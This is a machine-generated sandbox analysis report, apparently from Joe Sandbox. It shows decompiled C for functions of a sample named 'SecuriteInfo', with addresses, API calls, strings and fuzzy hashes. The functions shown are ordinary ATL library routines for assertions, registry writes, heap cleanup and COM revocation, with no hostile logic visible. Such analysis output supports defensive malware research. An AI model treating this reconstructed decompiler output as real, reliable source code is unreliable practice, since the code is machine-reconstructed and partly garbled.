				char _v44;
				signed int _v52;
				void* _t32;
				intOrPtr _t33;
				void* _t35;
				void* _t45;
				void* _t46;
				intOrPtr _t50;
				intOrPtr* _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;

				_t61 = __edx;
				_push(__ecx);
				_t67 =  &_v52;
				memset(_t67, 0xcccccccc, 0xc << 2);
				_t72 = _t71 + 0xc;
				_t68 = _t67 + 0xc;
				_pop(_t50);
				_v8 = _t50;
				if(_a4 == 0) {
					L2:
					_t32 = L00994930(_t75, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x115, 0, "%ls", L"pOps != 0 && rgStrings != 0");
					_t72 = _t72 + 0x18;
					if(_t32 == 1) {
						asm("int3");
					}
					L4:
					if(_a4 == 0 || _a8 == 0) {
						_t33 = 0x80070057;
						L17:
						_push(_t61);
						E009D14C0(_t70, 0x947fa4);
						_t35 = _t33;
						return E009D1520(_t35, _t70 - _t72 + 0x30);
					} else {
						_v12 = 0;
						while(1) {
							__eflags = _v12;
							if(_v12 < 0) {
								break;
							}
							__eflags =  *_a4;
							if( *_a4 == 0) {
								break;
							}
							_t61 = _a4;
							E0094A0F0(_v8,  *_t61,  &_v20,  &_v32,  &_v44);
							__eflags = _v20 - 7;
							if(_v20 == 7) {
								_v52 = _v32 | 0x80000000;
								_a4 = _a4 + 4;
								_t61 = _a8;
								_v12 = E009486D0(_t46, _v8, _t68, _t69, _v52,  &_a4, _t61, _a12, _a16, _a20);
								continue;
							}
							__eflags = 0;
							if(0 == 0) {
								_t45 = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x122, 0, "%ls", 0x9f40dc);
								_t72 = _t72 + 0x18;
								__eflags = _t45 - 1;
								if(_t45 == 1) {
									asm("int3");
								}
							}
							_t33 = 0x80004005;
							goto L17;
						}
						_t33 = _v12;
						goto L17;
					}
				}
				_t75 = _a8;
				if(_a8 != 0) {
					goto L4;
				}
				goto L2;
			}






















                      0x00947e70
                      0x00947e77
                      0x00947e78
                      0x00947e85
                      0x00947e85
                      0x00947e85
                      0x00947e87
                      0x00947e88
                      0x00947e8f
                      0x00947e97
                      0x00947eaf
                      0x00947eb4
                      0x00947eba
                      0x00947ebc
                      0x00947ebc
                      0x00947ebd
                      0x00947ec1
                      0x00947ec9
                      0x00947f80
                      0x00947f80
                      0x00947f8a
                      0x00947f8f
                      0x00947f9f
                      0x00947ed3
                      0x00947ed3
                      0x00947eda
                      0x00947eda
                      0x00947ede
                      0x00000000
                      0x00000000
                      0x00947ee7
                      0x00947eea
                      0x00000000
                      0x00000000
                      0x00947efc
                      0x00947f05
                      0x00947f0a
                      0x00947f0e
                      0x00947f49
                      0x00947f52
                      0x00947f61
                      0x00947f75
                      0x00000000
                      0x00947f75
                      0x00947f10
                      0x00947f12
                      0x00947f2c
                      0x00947f31
                      0x00947f34
                      0x00947f37
                      0x00947f39
                      0x00947f39
                      0x00947f37
                      0x00947f3a
                      0x00000000
                      0x00947f3a
                      0x00947f7d
                      0x00000000
                      0x00947f7d
                      0x00947ec1
                      0x00947e91
                      0x00947e95
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00947F8A
                      Strings
                      • %ls, xrefs: 00947E9C, 00947F19
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h, xrefs: 00947EA8, 00947F25
                      • pOps != 0 && rgStrings != 0, xrefs: 00947E97
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h$pOps != 0 && rgStrings != 0
                      • API String ID: 930174750-939455025
                      • Opcode ID: 952cea56c050617cfda45d6e14c5e00a4cdaf3ea876dcdd36f057e615848e050
                      • Instruction ID: 7a5ab9742a840651e2c6605a31ac476287c9bfcfc84ed1c3a1170ceb2fba2ab1
                      • Opcode Fuzzy Hash: 952cea56c050617cfda45d6e14c5e00a4cdaf3ea876dcdd36f057e615848e050
                      • Instruction Fuzzy Hash: 2731D471A0420CFBDB14DFC8DC56FEFB7B8AB84304F108559F609AA291D7749A84CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00941900 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 91memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 59%
                      			E00941900(void* __eflags, intOrPtr _a4) {
				char _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				char _v37;
				char _v52;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v76;
				intOrPtr _v84;
				char _v88;
				void _v92;
				void* _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t38;
				signed int _t39;
				intOrPtr _t42;
				void* _t49;
				void* _t52;
				void* _t53;
				intOrPtr _t66;
				void* _t68;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t76;
				intOrPtr _t78;
				char _t79;

				_push(0xfffffffe);
				_push(0xa02e58);
				_push(E00959CD0);
				_push( *[fs:0x0]);
				_push(_t52);
				memset( &_v92, 0xcccccccc, 0x10 << 2);
				_t78 = _t76 + 0xffffffffffffffc4;
				_t38 =  *0xa0600c; // 0x5d529087
				_v12 = _v12 ^ _t38;
				_t39 = _t38 ^ _t75;
				_v32 = _t39;
				_push(_t39);
				 *[fs:0x0] =  &_v20;
				_v28 = _t78;
				_v76 = 0;
				_v37 = 1;
				_v8 = 0;
				_v52 = 0;
				_t42 = E009516D0(_a4,  &_v52,  &_v52, _a4, 0x2000);
				_t79 = _t78 + 0xc;
				_v60 = _t42;
				if(_v60 >= 0) {
					_v84 = _v52 + 0x24;
					E009CF1D0(_v84);
					_v88 = _t79;
					_v28 = _t79;
					_t66 = _v84;
					E009D13A0(_v88, _t66,  &_v76);
					_t25 =  &_v88;
					 *_t25 = _v88 + 0x20;
					__eflags =  *_t25;
					_v64 = _v88;
				} else {
					_t66 = 0;
					if(0 == 0 && L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlalloc.h", 0x272, 0, ?str?, 0x9f40dc) == 1) {
						asm("int3");
					}
					_v37 = 0;
				}
				_v8 = 0xfffffffe;
				_push(_v37);
				E009D13E0(_t52, _t75, 0x941a58, _v76);
				_pop(_t49);
				_t68 = _t66;
				 *[fs:0x0] = _v20;
				_pop(_t72);
				_pop(_t74);
				_pop(_t53);
				return E00957280(_t49, _t53, _v32 ^ _t75, _t68, _t72, _t74);
			}


































                      0x00941903
                      0x00941905
                      0x0094190a
                      0x00941915
                      0x00941919
                      0x00941929
                      0x00941929
                      0x0094192b
                      0x00941930
                      0x00941933
                      0x00941935
                      0x00941938
                      0x0094193c
                      0x00941942
                      0x00941945
                      0x0094194c
                      0x00941950
                      0x00941957
                      0x0094196b
                      0x00941970
                      0x00941973
                      0x0094197a
                      0x009419b2
                      0x009419b8
                      0x009419bd
                      0x009419c0
                      0x009419c7
                      0x009419cd
                      0x009419d2
                      0x009419d2
                      0x009419d2
                      0x009419d9
                      0x0094197c
                      0x0094197c
                      0x0094197e
                      0x009419a5
                      0x009419a5
                      0x009419a6
                      0x009419a6
                      0x009419dc
                      0x00941a25
                      0x00941a2f
                      0x00941a34
                      0x00941a35
                      0x00941a3c
                      0x00941a44
                      0x00941a45
                      0x00941a46
                      0x00941a54

                      APIs
                        • Part of subcall function 009516D0: _HRESULT_FROM_WIN32.LIBCMTD ref: 009516E3
                      • @_RTC_AllocaHelper@12.LIBCMT ref: 009419CD
                      Strings
                      • %ls, xrefs: 00941985
                      • , xrefs: 009419D2
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlalloc.h, xrefs: 00941991
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: AllocaHelper@12
                      • String ID: $%ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlalloc.h
                      • API String ID: 1877400981-3363187302
                      • Opcode ID: e12d1dd742ed6ff40f5c3c9137b6354facf16a47904a5ef832dff0a279d7f391
                      • Instruction ID: e51df4b2e01b1f94233d8558fe675f4d6e2d865411e3a30863061b07f20b9c9f
                      • Opcode Fuzzy Hash: e12d1dd742ed6ff40f5c3c9137b6354facf16a47904a5ef832dff0a279d7f391
                      • Instruction Fuzzy Hash: 7F319C76E4434CAFDB10CFD8EC52BEEBBB5FB88714F104229E502AB281D77519498B91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009CFE00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66COMMON
                      Download Yara Rule
                      C-Code - Quality: 96%
                      			E009CFE00(void* __esi, WCHAR* _a4) {
				intOrPtr _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				signed int _t24;
				signed int _t25;
				WCHAR* _t27;
				void* _t32;
				void* _t44;
				void* _t45;

				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_t47 = _a4;
				if(_a4 == 0) {
					_t32 = L00994930(_t47, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1ca2, 0, L"%ls", L"lpszPathName != 0");
					_t45 = _t45 + 0x18;
					if(_t32 == 1) {
						asm("int3");
					}
				}
				if(_a4 != 0) {
					_v8 = _a4;
					_v12 = _a4;
					while(1) {
						__eflags =  *_v12 & 0x0000ffff;
						if(( *_v12 & 0x0000ffff) == 0) {
							break;
						}
						_t27 = CharNextW(_v12);
						__eflags = _t45 - _t45;
						_v16 = E009D1520(_t27, _t45 - _t45);
						__eflags = ( *_v12 & 0x0000ffff) - 0x5c;
						if(( *_v12 & 0x0000ffff) == 0x5c) {
							L10:
							_v8 = _v16;
							L11:
							_v12 = _v16;
							continue;
						}
						__eflags = ( *_v12 & 0x0000ffff) - 0x2f;
						if(( *_v12 & 0x0000ffff) == 0x2f) {
							goto L10;
						}
						__eflags = ( *_v12 & 0x0000ffff) - 0x3a;
						if(( *_v12 & 0x0000ffff) != 0x3a) {
							goto L11;
						}
						goto L10;
					}
					_t24 = _v8 - _a4;
					__eflags = _t24;
					_t25 = _t24 >> 1;
					goto L13;
				} else {
					_t25 = 0;
					L13:
					return E009D1520(_t25, _t44 - _t45 + 0xc);
				}
			}












                      0x009cfe07
                      0x009cfe0e
                      0x009cfe15
                      0x009cfe1c
                      0x009cfe20
                      0x009cfe3a
                      0x009cfe3f
                      0x009cfe45
                      0x009cfe47
                      0x009cfe47
                      0x009cfe45
                      0x009cfe4c
                      0x009cfe55
                      0x009cfe5b
                      0x009cfe5e
                      0x009cfe64
                      0x009cfe66
                      0x00000000
                      0x00000000
                      0x009cfe6e
                      0x009cfe74
                      0x009cfe7b
                      0x009cfe84
                      0x009cfe87
                      0x009cfe9f
                      0x009cfea2
                      0x009cfea5
                      0x009cfea8
                      0x00000000
                      0x009cfea8
                      0x009cfe8f
                      0x009cfe92
                      0x00000000
                      0x00000000
                      0x009cfe9a
                      0x009cfe9d
                      0x00000000
                      0x00000000
                      0x00000000
                      0x009cfe9d
                      0x009cfeb0
                      0x009cfeb0
                      0x009cfeb3
                      0x00000000
                      0x009cfe4e
                      0x009cfe4e
                      0x009cfeb6
                      0x009cfec3
                      0x009cfec3

                      APIs
                      • CharNextW.USER32(00000000), ref: 009CFE6E
                      Strings
                      • lpszPathName != 0, xrefs: 009CFE22
                      • %ls, xrefs: 009CFE27
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 009CFE33
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CharNext
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$lpszPathName != 0
                      • API String ID: 3213498283-4001971154
                      • Opcode ID: a7711924e0593b9dd062f895b2a90ca0c0d43bfa619be3084d4780b4a4e4670f
                      • Instruction ID: ceb8d49482d4117df2d2792e5283d6d003d42236ce0abe348f88005c2014685f
                      • Opcode Fuzzy Hash: a7711924e0593b9dd062f895b2a90ca0c0d43bfa619be3084d4780b4a4e4670f
                      • Instruction Fuzzy Hash: 0F219031E40208AFCB10DF8DD491FADBBB6EF44710F1081AEE805AB391D6749B80CB92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00946790 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 92%
                      			E00946790(intOrPtr __ecx, void* __esi) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				void* _t23;
				void* _t24;

				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				_t13 = _v8;
				 *_v8 = 0xa00190;
				if(( *(_v8 + 8) & 0x000000ff) != 0) {
					_t13 = _v8;
					if( *(_v8 + 4) != 0) {
						_v12 = E009D1520(HeapDestroy( *(_v8 + 4)), _t24 - _t24);
						_t29 = _v12;
						if(_v12 == 0) {
							_t13 = L00994930(_t29, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlmem.h", 0x74, 0, "%ls", L"bSuccess");
							_t24 = _t24 + 0x18;
							if(_t13 == 1) {
								asm("int3");
							}
						}
					}
				}
				return E009D1520(_t13, _t23 - _t24 + 8);
			}







                      0x00946797
                      0x0094679e
                      0x009467a5
                      0x009467a8
                      0x009467ab
                      0x009467ba
                      0x009467bc
                      0x009467c3
                      0x009467db
                      0x009467de
                      0x009467e2
                      0x009467f9
                      0x009467fe
                      0x00946804
                      0x00946806
                      0x00946806
                      0x00946804
                      0x009467e2
                      0x009467c3
                      0x00946815

                      APIs
                      Strings
                      • %ls, xrefs: 009467E9
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlmem.h, xrefs: 009467F2
                      • bSuccess, xrefs: 009467E4
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: DestroyHeap
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlmem.h$bSuccess
                      • API String ID: 2435110975-1732559737
                      • Opcode ID: bf9d787a647f03400cae22f5fdfb51eaca15f7cf013dd72a95d98402e5e068ac
                      • Instruction ID: 736974b46098747611c868b1326051d8e174f94acb5f4c2b065b5c9c1ec4a9c5
                      • Opcode Fuzzy Hash: bf9d787a647f03400cae22f5fdfb51eaca15f7cf013dd72a95d98402e5e068ac
                      • Instruction Fuzzy Hash: 3001F7B1E44208EFCB10DB9CD842F6DBBB49F8170CF248599E90427381D7719E40CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00944740 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 35%
                      			E00944740(void** __ecx, void* __esi, char* _a4, char* _a8, int _a12) {
				void** _v8;
				void* _t14;
				void* _t23;
				void* _t24;

				_push(__ecx);
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				do {
					_t26 =  *_v8;
					if( *_v8 == 0) {
						_t14 = L00994930(_t26, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x185e, 0, "%ls", L"m_hKey != 0");
						_t24 = _t24 + 0x18;
						if(_t14 == 1) {
							asm("int3");
						}
					}
				} while (0 != 0);
				return E009D1520(E009D1520(RegSetValueExA( *_v8, _a4, 0, 3, _a8, _a12), _t24 - _t24), _t23 - _t24 + 4);
			}







                      0x00944743
                      0x00944745
                      0x0094474c
                      0x0094474f
                      0x00944752
                      0x00944755
                      0x0094476f
                      0x00944774
                      0x0094477a
                      0x0094477c
                      0x0094477c
                      0x0094477a
                      0x0094477d
                      0x009447b4

                      APIs
                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,?), ref: 00944799
                      Strings
                      • %ls, xrefs: 0094475C
                      • m_hKey != 0, xrefs: 00944757
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00944768
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Value
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$m_hKey != 0
                      • API String ID: 3702945584-645619241
                      • Opcode ID: dfd0e9f8c4f7721f651ee3673bf54fb2d5fb3e3e1c15fc09d845a2eca983af9a
                      • Instruction ID: a50c2705bcc753197c27290cf716352c68f3e6087a47d4f3df4910d47991d34e
                      • Opcode Fuzzy Hash: dfd0e9f8c4f7721f651ee3673bf54fb2d5fb3e3e1c15fc09d845a2eca983af9a
                      • Instruction Fuzzy Hash: 3301A472E80208BFDB24EB88DC43FAE73699B95714F108159F604AB281E7B1AE5087D1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009447C0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 35%
                      			E009447C0(void** __ecx, void* __esi, char* _a4, char _a8) {
				void** _v8;
				void* _t13;
				void* _t21;
				void* _t22;

				_push(__ecx);
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				do {
					_t24 =  *_v8;
					if( *_v8 == 0) {
						_t13 = L00994930(_t24, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1866, 0, "%ls", L"m_hKey != 0");
						_t22 = _t22 + 0x18;
						if(_t13 == 1) {
							asm("int3");
						}
					}
				} while (0 != 0);
				return E009D1520(E009D1520(RegSetValueExA( *_v8, _a4, 0, 4,  &_a8, 4), _t22 - _t22), _t21 - _t22 + 4);
			}







                      0x009447c3
                      0x009447c5
                      0x009447cc
                      0x009447cf
                      0x009447d2
                      0x009447d5
                      0x009447ef
                      0x009447f4
                      0x009447fa
                      0x009447fc
                      0x009447fc
                      0x009447fa
                      0x009447fd
                      0x00944832

                      APIs
                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 00944817
                      Strings
                      • %ls, xrefs: 009447DC
                      • m_hKey != 0, xrefs: 009447D7
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 009447E8
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Value
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$m_hKey != 0
                      • API String ID: 3702945584-645619241
                      • Opcode ID: f13b20bce8d99a96126cb0e227c16ce03b914f1cb461c3d4080276ea300b08a0
                      • Instruction ID: c46bfb89279a5a7f28dfc79a40e7ff9f63ff06f32a264379eadffc04189ce1ab
                      • Opcode Fuzzy Hash: f13b20bce8d99a96126cb0e227c16ce03b914f1cb461c3d4080276ea300b08a0
                      • Instruction Fuzzy Hash: 9EF06871E84208BBDB10EB88DC43FAE735D9B51754F108155F705AB2C1E6B55E4087D6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00943430 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38COMMON
                      Download Yara Rule
                      C-Code - Quality: 28%
                      			E00943430(void* __esi, intOrPtr _a4) {
				intOrPtr _t9;
				void* _t12;
				void* _t14;
				void* _t21;
				void* _t22;

				do {
					_t9 = _a4;
					_t23 =  *((intOrPtr*)(_t9 + 0x10));
					if( *((intOrPtr*)(_t9 + 0x10)) == 0) {
						_t14 = L00994930(_t23, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xf0, 0, "%ls", L"pCache != 0");
						_t22 = _t22 + 0x18;
						if(_t14 == 1) {
							asm("int3");
						}
					}
				} while (0 != 0);
				if( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + 4)) != 0) {
					__imp__CoRevokeClassObject( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + 4)));
					__eflags = _t22 - _t22;
					_t12 = E009D1520( *((intOrPtr*)(_a4 + 0x10)), __eflags);
				} else {
					_t12 = 0;
				}
				return E009D1520(_t12, _t21 - _t22);
			}








                      0x00943434
                      0x00943434
                      0x00943437
                      0x0094343b
                      0x00943455
                      0x0094345a
                      0x00943460
                      0x00943462
                      0x00943462
                      0x00943460
                      0x00943463
                      0x00943471
                      0x00943483
                      0x00943489
                      0x0094348b
                      0x00943473
                      0x00943473
                      0x00943473
                      0x00943499

                      APIs
                      • CoRevokeClassObject.OLE32(?), ref: 00943483
                      Strings
                      • %ls, xrefs: 00943442
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 0094344E
                      • pCache != 0, xrefs: 0094343D
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ClassObjectRevoke
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$pCache != 0
                      • API String ID: 1224902704-3984120347
                      • Opcode ID: 7d53f75518d55cd164db19e0b072ef0bb4b72b2d16dddc36c580c155e9d7bacb
                      • Instruction ID: 26181c3f3d9fff4ce579a5d83c6c91ad5e4359217e95bafebc3e9454eb2ba425
                      • Opcode Fuzzy Hash: 7d53f75518d55cd164db19e0b072ef0bb4b72b2d16dddc36c580c155e9d7bacb
